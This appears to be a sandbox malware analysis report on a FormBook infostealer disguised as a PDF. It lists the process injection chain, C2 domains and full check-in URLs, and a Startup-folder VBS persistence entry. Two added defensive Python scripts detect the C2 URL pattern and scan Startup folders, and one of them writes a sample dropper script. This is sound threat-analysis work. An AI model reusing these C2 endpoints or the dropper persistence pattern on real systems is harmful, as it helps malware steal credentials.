    dropped: C:\Users\user\AppData\Local\...\cunila.exe (PE32)
    signatures: Binary is likely a compiled AutoIt script file
    -> cunila.exe (started)
        dropped: C:\Users\user\AppData\Roaming\...\cunila.vbs (data)
        signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures
        -> svchost.exe (started)
            signatures: Maps a DLL or memory area into another process
            -> XzXxPWzavnqD.exe (injected)
                signatures: Found direct / indirect Syscall (likely to bypass EDR)
                -> upnpcont.exe (started)
                    signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                    -> XzXxPWzavnqD.exe (injected)
                        network: www.moumore.top 203.161.46.205 (ports 49961, 49973, 49985; VNPT-AS-VNVNPTCorpVN, Malaysia); carsten.studio 217.160.0.200 (ports 49890, 49903, 49914; ONEANDONE-ASBrauerstrasse48DE, Germany); 3 other IPs or domains
                        signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    -> firefox.exe (started)

wscript.exe (started)
    signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    -> cunila.exe (started)
        signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
        -> svchost.exe (started)

Antivirus detection, submitted sample
Source | Detection | Scanner | Label
5674656777985-069688574654 pdf.exe | 76% | ReversingLabs | Win32.Trojan.AutoitInject
5674656777985-069688574654 pdf.exe | 56% | Virustotal |
5674656777985-069688574654 pdf.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\retrofit\cunila.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\retrofit\cunila.exe | 76% | ReversingLabs | Win32.Trojan.AutoitInject

No Antivirus matches

Antivirus detection, domains
Source | Detection | Scanner | Label
carsten.studio | 1% | Virustotal |
www.vpnto.net | 0% | Virustotal |
tempatmudisini06.click | 3% | Virustotal |

Antivirus detection, URLs
Source | Detection | Scanner | Label
http://www.sitioseguro.blog | 0% | Avira URL Cloud | safe
http://www.vpnto.net/s8dp/?5lf8fv8H=rltVgnxG7skGUaMKpVhyEPF4v5Ox4an8JStNzNQrUbrzak/EOBCVCfZgcjG6plEiD8Vg4P/IIwGC19xvtxAv8Aa2yBIi9XmnoCp9ndMs1wSssRnKGiU00wY=&AjEdl=yJNdk0d | 0% | Avira URL Cloud | safe
http://www.sitioseguro.blog/6o0x/ | 0% | Avira URL Cloud | safe
http://www.carsten.studio/bdk6/ | 0% | Avira URL Cloud | safe
http://www.moumore.top/cdzk/ | 0% | Avira URL Cloud | safe
http://www.tempatmudisini06.click/5jq3/?AjEdl=yJNdk0d&5lf8fv8H=yIj9FEq6F0t9Cr9krCaOZjvPrwz7BUN2KJdByNXo/qcAvamNSMMSktux9ZEHvDPxROSkUK3HLwPZkwRHUMJC19uHNEPIeSAiG60jprZNGQbwC+UuOuY/6g8= | 0% | Avira URL Cloud | safe
http://www.carsten.studio/bdk6/?5lf8fv8H=PqqBR4APLBjeVAmu2KnBSDyL46X5a3+HeWwKYykJckqyTL6p8r6dck4h/UhP8B2/GHgzxj3GR86X2rSMsvymfcz7/xb/ILUp+u45DggP4jd1Psv37cGY6aI=&AjEdl=yJNdk0d | 0% | Avira URL Cloud | safe
http://www.moumore.top/cdzk/?5lf8fv8H=21WYxGgPduaG4GNc3Gz+IA1od9in8z0gHg6tlHBueZVX7I1lHyAgjC+unpy7ykSEAjKQ6zcABHQV1iatk3ebx4o/Jp1Tx0HqQTzE31uUJivnuywq0aLhSQU=&AjEdl=yJNdk0d | 0% | Avira URL Cloud | safe
http://www.vpnto.net/s8dp/ | 0% | Avira URL Cloud | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.moumore.top | 203.161.46.205 | true | true | | unknown
carsten.studio | 217.160.0.200 | true | true | | unknown
www.vpnto.net | 91.226.30.3 | true | true | | unknown
tempatmudisini06.click | 103.21.221.4 | true | false | | unknown
www.sitioseguro.blog | 104.21.15.100 | true | true | | unknown
www.tempatmudisini06.click | unknown | unknown | false | | unknown
www.carsten.studio | unknown | unknown | false | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://www.carsten.studio/bdk6/ | true | Avira URL Cloud: safe | unknown
http://www.vpnto.net/s8dp/?5lf8fv8H=rltVgnxG7skGUaMKpVhyEPF4v5Ox4an8JStNzNQrUbrzak/EOBCVCfZgcjG6plEiD8Vg4P/IIwGC19xvtxAv8Aa2yBIi9XmnoCp9ndMs1wSssRnKGiU00wY=&AjEdl=yJNdk0d | true | Avira URL Cloud: safe | unknown
http://www.carsten.studio/bdk6/?5lf8fv8H=PqqBR4APLBjeVAmu2KnBSDyL46X5a3+HeWwKYykJckqyTL6p8r6dck4h/UhP8B2/GHgzxj3GR86X2rSMsvymfcz7/xb/ILUp+u45DggP4jd1Psv37cGY6aI=&AjEdl=yJNdk0d | true | Avira URL Cloud: safe | unknown
http://www.moumore.top/cdzk/?5lf8fv8H=21WYxGgPduaG4GNc3Gz+IA1od9in8z0gHg6tlHBueZVX7I1lHyAgjC+unpy7ykSEAjKQ6zcABHQV1iatk3ebx4o/Jp1Tx0HqQTzE31uUJivnuywq0aLhSQU=&AjEdl=yJNdk0d | true | Avira URL Cloud: safe | unknown
http://www.vpnto.net/s8dp/ | true | Avira URL Cloud: safe | unknown
http://www.sitioseguro.blog/6o0x/ | true | Avira URL Cloud: safe | unknown
http://www.moumore.top/cdzk/ | true | Avira URL Cloud: safe | unknown
http://www.tempatmudisini06.click/5jq3/?AjEdl=yJNdk0d&5lf8fv8H=yIj9FEq6F0t9Cr9krCaOZjvPrwz7BUN2KJdByNXo/qcAvamNSMMSktux9ZEHvDPxROSkUK3HLwPZkwRHUMJC19uHNEPIeSAiG60jprZNGQbwC+UuOuY/6g8= | false | Avira URL Cloud: safe | unknown
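The four complete check-in URLs above share one structure: plain HTTP to a four-character directory, one long base64-looking parameter carrying the encrypted beacon body and one short parameter, with the two parameters in either order. The script below is an added example and is not part of the Joe Sandbox report: it flags proxy-log lines either because the host is one of the C2 hosts listed in this report or because the URL has that shape, so a new FormBook domain still trips the second check. The log-line format, the benign lines, the host c2.example.net and the shape regexes are constructed assumptions, not a FormBook specification; the only values taken from the page are the hosts and URLs.

```python
import re
from urllib.parse import urlsplit

# C2 hosts taken from the URL and domain tables of this report.
REPORT_C2_HOSTS = {
    "www.vpnto.net",
    "www.sitioseguro.blog",
    "www.carsten.studio",
    "www.moumore.top",
    "www.tempatmudisini06.click",
}

# Shape shared by the four complete check-in URLs in the report:
#   http://<host>/<4 alnum chars>/?<short key>=<long base64 blob>&<short key>=<short token>
# The regexes generalise that shape; they are an assumption, not a FormBook specification.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")


def split_query(query):
    """Split a raw query string into (key, value) pairs without decoding.
    parse_qsl() is avoided on purpose: it turns '+' into a space, which
    would break the base64 check on the beacon parameter."""
    pairs = []
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def looks_like_formbook_checkin(url):
    """True if the URL has the check-in shape: plain http, a single 4-character
    directory, one long base64-looking parameter (length a multiple of 4)
    and at least one short parameter, in any order."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not PATH_RE.match(parts.path):
        return False
    params = split_query(parts.query)
    if len(params) < 2:
        return False
    long_vals = [v for _, v in params if B64_RE.match(v) and len(v) % 4 == 0]
    short_vals = [v for _, v in params if 0 < len(v) < 16]
    return bool(long_vals) and bool(short_vals)


def classify(url):
    """Return the reasons a URL is flagged: 'ioc' when the host is one of the
    report's C2 hosts, 'pattern' when the URL shape matches, or both."""
    host = (urlsplit(url).hostname or "").lower()
    reasons = set()
    if host in REPORT_C2_HOSTS:
        reasons.add("ioc")
    if looks_like_formbook_checkin(url):
        reasons.add("pattern")
    return reasons


def scan_proxy_log(lines):
    """Scan constructed proxy-log lines of the form
    '<timestamp> <client> <method> <url>' and return (url, reasons) hits."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        reasons = classify(fields[3])
        if reasons:
            hits.append((fields[3], sorted(reasons)))
    return hits


# Constructed sample log: the four complete check-in URLs and one path-only URL
# from the report, then benign browser traffic and an unknown host reusing the shape.
SAMPLE_LOG = [
    "2024-11-19T02:56:01Z 10.0.0.5 GET http://www.vpnto.net/s8dp/?5lf8fv8H=rltVgnxG7skGUaMKpVhyEPF4v5Ox4an8JStNzNQrUbrzak/EOBCVCfZgcjG6plEiD8Vg4P/IIwGC19xvtxAv8Aa2yBIi9XmnoCp9ndMs1wSssRnKGiU00wY=&AjEdl=yJNdk0d",
    "2024-11-19T02:56:14Z 10.0.0.5 GET http://www.tempatmudisini06.click/5jq3/?AjEdl=yJNdk0d&5lf8fv8H=yIj9FEq6F0t9Cr9krCaOZjvPrwz7BUN2KJdByNXo/qcAvamNSMMSktux9ZEHvDPxROSkUK3HLwPZkwRHUMJC19uHNEPIeSAiG60jprZNGQbwC+UuOuY/6g8=",
    "2024-11-19T02:56:27Z 10.0.0.5 GET http://www.carsten.studio/bdk6/?5lf8fv8H=PqqBR4APLBjeVAmu2KnBSDyL46X5a3+HeWwKYykJckqyTL6p8r6dck4h/UhP8B2/GHgzxj3GR86X2rSMsvymfcz7/xb/ILUp+u45DggP4jd1Psv37cGY6aI=&AjEdl=yJNdk0d",
    "2024-11-19T02:56:40Z 10.0.0.5 GET http://www.moumore.top/cdzk/?5lf8fv8H=21WYxGgPduaG4GNc3Gz+IA1od9in8z0gHg6tlHBueZVX7I1lHyAgjC+unpy7ykSEAjKQ6zcABHQV1iatk3ebx4o/Jp1Tx0HqQTzE31uUJivnuywq0aLhSQU=&AjEdl=yJNdk0d",
    "2024-11-19T02:56:53Z 10.0.0.5 POST http://www.sitioseguro.blog/6o0x/",
    "2024-11-19T02:57:02Z 10.0.0.5 GET https://duckduckgo.com/ac/?q=upnpcont.exe",
    "2024-11-19T02:57:10Z 10.0.0.5 GET http://www.example.org/abcd/?q=hello&lang=en",
    "2024-11-19T02:57:21Z 10.0.0.5 GET http://c2.example.net/q1w2/?k=" + "QUJD" * 30 + "&z=abc",
]

if __name__ == "__main__":
    for url, reasons in scan_proxy_log(SAMPLE_LOG):
        print(",".join(reasons), url)
```

The path-only POST to www.sitioseguro.blog is caught by the host list alone, and the last line is caught by the shape alone; in practice the shape check is a triage filter to run before the heavier work of confirming the host against threat intelligence, since a four-character directory with a long base64 parameter is rare in benign traffic but not unique to FormBook.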
URLs found in memory or binary data
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.sitioseguro.blog | XzXxPWzavnqD.exe, 0000000B.00000002.3083758728.0000000002AF6000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | upnpcont.exe, 0000000A.00000002.3085844190.00000000039E8000.00000004.10000000.00040000.00000000.sdmp; XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.0000000003788000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.strato.de | XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.00000000035F6000.00000004.00000001.00040000.00000000.sdmp | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
103.21.221.4 | tempatmudisini06.click | unknown | 9905 | LINKNET-ID-APLinknetASNID | false
104.21.15.100 | www.sitioseguro.blog | United States | 13335 | CLOUDFLARENETUS | true
217.160.0.200 | carsten.studio | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
203.161.46.205 | www.moumore.top | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
91.226.30.3 | www.vpnto.net | Russian Federation | 56601 | I7-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1558148
Start date and time: 2024-11-19 03:54:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 5674656777985-069688574654 pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@14/7@5/5
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 98%
                                                  • Number of executed functions: 53
                                                  • Number of non-executed functions: 300
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:55:15 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs
21:56:38 | API Interceptor | 769094x Sleep call for process: upnpcont.exe modified
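The Autostart entry above is the persistence leg of the chain shown in the behavior graph: cunila.exe drops cunila.vbs into the per-user Startup folder, and on the next logon wscript.exe runs that script, which starts cunila.exe again. The scanner below is an added example, not part of the Joe Sandbox report: it lists script files in the Startup folders, records which WSH launch idioms each one uses and which Windows paths it references, so a dropper that re-launches a binary from AppData stands out. The demo folder, the dropper body and the launch-idiom patterns are constructed here (the report does not show the contents of cunila.vbs); only the file name and the target path come from the page.

```python
import os
import re
import tempfile

# Script types Windows launches from the Startup folder via WSH, cmd or PowerShell.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1"}

# Generic launch/COM idioms used by script droppers. Assumption: hunting patterns
# chosen here, not derived from cunila.vbs, whose contents the report does not show.
LAUNCH_RE = re.compile(
    r"WScript\.Shell|Shell\.Application|CreateObject|\.Run\b|\.ShellExecute\b|\.Exec\b",
    re.IGNORECASE,
)
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^\"'\s]+")

# Where to look on a real host; the per-user path matches the Autostart entry in the report.
# On a non-Windows host these stay unexpanded, do not exist, and are skipped.
DEFAULT_STARTUP_DIRS = [
    os.path.expandvars(r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"),
    os.path.expandvars(r"%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp"),
]


def scan_startup_dirs(dirs):
    """Return one finding per script file found in the given Startup folders:
    the launch idioms it uses and the Windows paths it references."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            ext = os.path.splitext(name)[1].lower()
            if not os.path.isfile(path) or ext not in SCRIPT_EXTS:
                continue
            try:
                with open(path, "r", errors="replace") as fh:
                    body = fh.read(65536)
            except OSError:
                continue
            findings.append({
                "file": path,
                "ext": ext,
                "launch_idioms": sorted({m.group(0) for m in LAUNCH_RE.finditer(body)}),
                "targets": WIN_PATH_RE.findall(body),
            })
    return findings


def build_demo_startup_dir():
    """Constructed stand-in for a user's Startup folder: a WSH dropper named like
    the one in the report (its body is made up here) next to a shortcut and desktop.ini."""
    d = tempfile.mkdtemp(prefix="startup-demo-")
    with open(os.path.join(d, "cunila.vbs"), "w") as fh:
        fh.write('Set objShell = CreateObject("WScript.Shell")\r\n')
        fh.write('objShell.Run """C:\\Users\\user\\AppData\\Local\\retrofit\\cunila.exe""", 0, False\r\n')
    with open(os.path.join(d, "OneDrive.lnk"), "wb") as fh:
        fh.write(b"L\x00\x00\x00")  # shortcut header bytes only; not a script, so ignored
    with open(os.path.join(d, "desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\r\n")
    return d


if __name__ == "__main__":
    demo = build_demo_startup_dir()
    for f in scan_startup_dirs([demo] + DEFAULT_STARTUP_DIRS):
        print(f["file"], f["launch_idioms"], f["targets"])
```

Run on a live host, the finding to act on is any Startup script whose referenced path points into a user-writable location such as AppData\Local, which is exactly what this sample's cunila.vbs does; legitimate Startup entries are almost always .lnk shortcuts, not script files.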
Context for contacted IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
103.21.221.4 | FOTOĞRAFLAR.exe | malicious | FormBook | www.tempatmudisini06.click/kfzf/
103.21.221.4 | Z6s208B9QX.exe | malicious | FormBook | www.tempatmudisini01.click/abla/
103.21.221.4 | -pdf.bat.exe | malicious | FormBook | www.tempatmudisini01.click/iydt/
103.21.221.4 | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | www.tempatmudisini01.click/iydt/
103.21.221.4 | RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | www.tempatmudisini01.click/abla/
103.21.221.4 | Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook | www.tempatmudisini01.click/phdl/
103.21.221.4 | ncOLm62YLB.exe | malicious | FormBook | www.tempatmudisini01.click/lybf/
103.21.221.4 | SecuriteInfo.com.Win32.Malware-gen.10660.18305.exe | malicious | FormBook | www.tempatmudisini01.click/r9rj/
103.21.221.4 | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | www.tempatmudisini01.click/abla/
217.160.0.200 | PO-3170012466.exe | malicious | FormBook | www.dukesribbar.com/bbk4/?h0DhlHu=f2IIPTVxZMpXMJMuzfnk2NWDEb+JwK8g816o2ZnROlKngCQ4rxAc1D8js0OmEx/F+OtZ&tXi0=MXbP9
203.161.46.205 | Quotation request -30112024_pdf.exe | malicious | FormBook | www.startvin.top/chrv/
203.161.46.205 | PO-DC13112024_pdf.vbs | malicious | Unknown | www.nimil.info/gdpp/
203.161.46.205 | Item-RQF-9456786.exe | malicious | Unknown | www.ecojomos.xyz/uaef/
203.161.46.205 | ImBm40hNZ2.exe | malicious | FormBook, GuLoader | www.bullbord.top/veti/
203.161.46.205 | Solicitud de Cotización – Catálogo de Muestras2024.vbs | malicious | FormBook, GuLoader | www.bullbord.top/veti/
203.161.46.205 | 報價請求 - 樣本目錄.vbs | malicious | FormBook, GuLoader | www.bullbord.top/veti/
203.161.46.205 | Request for Quotation + sample catalog.vbs | malicious | FormBook | www.bullbord.top/veti/
203.161.46.205 | Payment Swift-67654.pdf.scr.exe | malicious | FormBook, PureLog Stealer | www.jucicty.xyz/8u8r/
203.161.46.205 | Prośba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | www.bullbord.top/veti/
203.161.46.205 | Payment Advice - Advice Ref[BIBBC2023189].exe | malicious | FormBook, PureLog Stealer | www.jucicty.xyz/8u8r/
Context for contacted ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ONEANDONE-ASBrauerstrasse48DE | ajbKFgQ0Fl.exe | malicious | Unknown | 82.165.206.196
ONEANDONE-ASBrauerstrasse48DE | https://www.fc-pruem.de/readme/ | malicious | Unknown | 217.160.0.97
ONEANDONE-ASBrauerstrasse48DE | PROFORMA INVOICE.exe | malicious | FormBook | 217.76.156.252
ONEANDONE-ASBrauerstrasse48DE | xd.x86.elf | malicious | Mirai | 104.192.6.97
ONEANDONE-ASBrauerstrasse48DE | wavjjT3sEq.exe | malicious | FormBook | 217.160.0.231
ONEANDONE-ASBrauerstrasse48DE | Arrival Notice.exe | malicious | FormBook | 217.160.0.60
ONEANDONE-ASBrauerstrasse48DE | mNtu4X8ZyE.exe | malicious | Emotet | 87.106.46.107
ONEANDONE-ASBrauerstrasse48DE | 75A0VTo3z9.exe | malicious | Emotet | 87.106.46.107
ONEANDONE-ASBrauerstrasse48DE | New PO [FK4-7173].pdf.exe | malicious | FormBook | 217.160.0.220
ONEANDONE-ASBrauerstrasse48DE | Digiturk.html | malicious | HTMLPhisher | 217.160.0.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.188.199
CLOUDFLARENETUS | rPO_1079021908.exe | malicious | MassLogger RAT | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.85.146
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | https://gamesnewhere.s3.us-west-2.amazonaws.com/rere.html | malicious | Phisher | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.96.3
CLOUDFLARENETUS | 1Sj5F6P4nv.exe | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
CLOUDFLARENETUS | https://website-70396.convertflowpages.com/firstmarkinsurance | malicious | HTMLPhisher | 162.247.243.39
LINKNET-ID-APLinknetASNID | owari.ppc.elf | malicious | Unknown | 139.65.64.42
LINKNET-ID-APLinknetASNID | dvwkja7.elf | malicious | Mirai | 139.255.236.143
LINKNET-ID-APLinknetASNID | FOTOĞRAFLAR.exe | malicious | FormBook | 103.21.221.4
LINKNET-ID-APLinknetASNID | amen.arm6.elf | malicious | Mirai | 139.255.236.186
LINKNET-ID-APLinknetASNID | amen.m68k.elf | malicious | Unknown | 139.43.9.147
LINKNET-ID-APLinknetASNID | sora.mips.elf | malicious | Mirai | 139.255.236.186
LINKNET-ID-APLinknetASNID | byte.arm7.elf | malicious | Mirai, Okiru | 139.25.197.11
LINKNET-ID-APLinknetASNID | wZU2edEGL3.elf | malicious | Unknown | 139.44.166.66
LINKNET-ID-APLinknetASNID | jew.spc.elf | malicious | Mirai | 139.40.24.226
LINKNET-ID-APLinknetASNID | la.bot.arm5.elf | malicious | Unknown | 139.33.31.27
VNPT-AS-VNVNPTCorpVN | MV KODCO.exe | malicious | FormBook | 203.161.49.193
VNPT-AS-VNVNPTCorpVN | PO 20495088.exe | malicious | FormBook | 203.161.49.193
VNPT-AS-VNVNPTCorpVN | Quotation request -30112024_pdf.exe | malicious | FormBook | 203.161.46.205
VNPT-AS-VNVNPTCorpVN | Arrival Notice_pdf.exe | malicious | FormBook | 203.161.49.193
VNPT-AS-VNVNPTCorpVN | protected.ps1 | malicious | Unknown | 202.92.4.57
VNPT-AS-VNVNPTCorpVN | PROFORMA INVOICE.exe | malicious | FormBook | 203.161.49.193
VNPT-AS-VNVNPTCorpVN | yakuza.arm4.elf | malicious | Mirai | 14.186.221.243
VNPT-AS-VNVNPTCorpVN | yakuza.ppc.elf | malicious | Mirai | 14.248.237.190
VNPT-AS-VNVNPTCorpVN | http://weststoneltd.technolutionszzzz.net | malicious | EvilProxy, HTMLPhisher | 203.161.41.21
VNPT-AS-VNVNPTCorpVN | x86.elf | malicious | Unknown | 113.189.0.97
                                                  No context
                                                  No context
                                                  Process:C:\Windows\SysWOW64\upnpcont.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):114688
                                                  Entropy (8bit):0.9746603542602881
                                                  Encrypted:false
                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Process:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.993561572512903
                                                  Encrypted:true
                                                  SSDEEP:6144:iL5hjD14lB5X+VyqzglJe8o3W1wjm5f6WjqNwDlY:SfgBezye8om1wa5e6RY
                                                  MD5:DFAA91FD5C9660FB823F58C6A0B9DFD8
                                                  SHA1:22D8A197E5DCB0B6492B5A4544F97A55F07A9634
                                                  SHA-256:FFEFC8FE626402DA1A4FD8D7D48713E533F0D4EDB6ACD4852773DD0823A310D9
                                                  SHA-512:67A5536588B785C2BF431150B1627D479C6B48D748617C955B489C3826CADE93901620BCA192742A4A3BC8108BBB3C24395C28B3CE4400F6CBD1EA47B8535B74
                                                  Malicious:false
                                                  Reputation:low
                                                  Process:C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.993561572512903
                                                  Encrypted:true
                                                  SSDEEP:6144:iL5hjD14lB5X+VyqzglJe8o3W1wjm5f6WjqNwDlY:SfgBezye8om1wa5e6RY
                                                  MD5:DFAA91FD5C9660FB823F58C6A0B9DFD8
                                                  SHA1:22D8A197E5DCB0B6492B5A4544F97A55F07A9634
                                                  SHA-256:FFEFC8FE626402DA1A4FD8D7D48713E533F0D4EDB6ACD4852773DD0823A310D9
                                                  SHA-512:67A5536588B785C2BF431150B1627D479C6B48D748617C955B489C3826CADE93901620BCA192742A4A3BC8108BBB3C24395C28B3CE4400F6CBD1EA47B8535B74
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.993561572512903
                                                  Encrypted:true
                                                  SSDEEP:6144:iL5hjD14lB5X+VyqzglJe8o3W1wjm5f6WjqNwDlY:SfgBezye8om1wa5e6RY
                                                  MD5:DFAA91FD5C9660FB823F58C6A0B9DFD8
                                                  SHA1:22D8A197E5DCB0B6492B5A4544F97A55F07A9634
                                                  SHA-256:FFEFC8FE626402DA1A4FD8D7D48713E533F0D4EDB6ACD4852773DD0823A310D9
                                                  SHA-512:67A5536588B785C2BF431150B1627D479C6B48D748617C955B489C3826CADE93901620BCA192742A4A3BC8108BBB3C24395C28B3CE4400F6CBD1EA47B8535B74
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.993561572512903
                                                  Encrypted:true
                                                  SSDEEP:6144:iL5hjD14lB5X+VyqzglJe8o3W1wjm5f6WjqNwDlY:SfgBezye8om1wa5e6RY
                                                  MD5:DFAA91FD5C9660FB823F58C6A0B9DFD8
                                                  SHA1:22D8A197E5DCB0B6492B5A4544F97A55F07A9634
                                                  SHA-256:FFEFC8FE626402DA1A4FD8D7D48713E533F0D4EDB6ACD4852773DD0823A310D9
                                                  SHA-512:67A5536588B785C2BF431150B1627D479C6B48D748617C955B489C3826CADE93901620BCA192742A4A3BC8108BBB3C24395C28B3CE4400F6CBD1EA47B8535B74
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1189888
                                                  Entropy (8bit):7.164870375096438
                                                  Encrypted:false
